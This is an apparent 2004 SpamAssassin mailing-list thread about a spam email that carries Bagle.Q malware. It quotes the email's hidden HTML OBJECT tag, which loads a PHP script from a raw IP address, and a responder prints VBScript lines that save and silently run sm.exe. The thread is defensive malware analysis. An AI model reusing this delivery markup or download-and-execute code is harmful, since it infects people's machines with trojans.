> > -----Original Message----- > > From: Rick Macdougall [mailto:[EMAIL PROTECTED] > > Sent: Thursday, March 18, 2004 9:54 AM > > To: Spamassassin-Talk (E-mail) > > Subject: Re: interesting email... > > > > > > Chris Santerre wrote: > > > > > I think this is a spam :-) I don't allow scripting from my > > machine. Anyone > > > get something like this: (I munged the To field.) > > > > > > Received: from aandrews.org > > (orf-dsl5010-64-83-56-134-vlan12.dsl.cavtel.net > > > [64.83.56.134]) > > > by moglobal.com (8.12.5/8.12.5) with SMTP id i2IEZt0t017750 > > > for <[EMAIL PROTECTED]>; Thu, 18 Mar 2004 09:36:05 -0500 > > > Date: Thu, 18 Mar 2004 09:31:55 -0500 > > > To: [EMAIL PROTECTED] > > > Subject: Encrypted document > > > > > > <html><body> > > > <font face="System"> > > > <OBJECT STYLE="display:none" > > DATA="http://68.115.29.29:81/679186.php";> > > > </OBJECT></body></html> > > > > > > Tried to go to the site without the php file but got > > nothing. appears to > > > point to a home user of broadbands machine. Possibly > > trojaned??? Anyone got > > > the guts to chech out the php script? I don't! :) > > > > Hi, > > > > Bagle.Q, the php executes a vbscript posing as "Windows > > Update" and gets > > a file called sm.exe and runs it. The relavant code is below > > > > TSO.write "BinaryStream.SaveToFile ""sm.exe"", > > adSaveCreateOverWrite" & > > vbcrlf > > TSO.write "Dim WshShell" & vbcrlf > > TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf > > TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf > > > > The php file generates a 1776 byte html file that contains > the above > > code (as well as additional stuff, it's safe to fetch or wget > > the url on > > a U*ix machine. > > > > Regards, > > > > Rick > >
Thanks all! I'm a week or so behind in my viral readings. But not my updates ;) I don't allow activeX scripting, so it didn't run the script. I also realised right after I posted this, Doh! Just go to the linux machine and get it! LOL. And the more spam I get, the more that gets added to Bigevil :-) --chris >
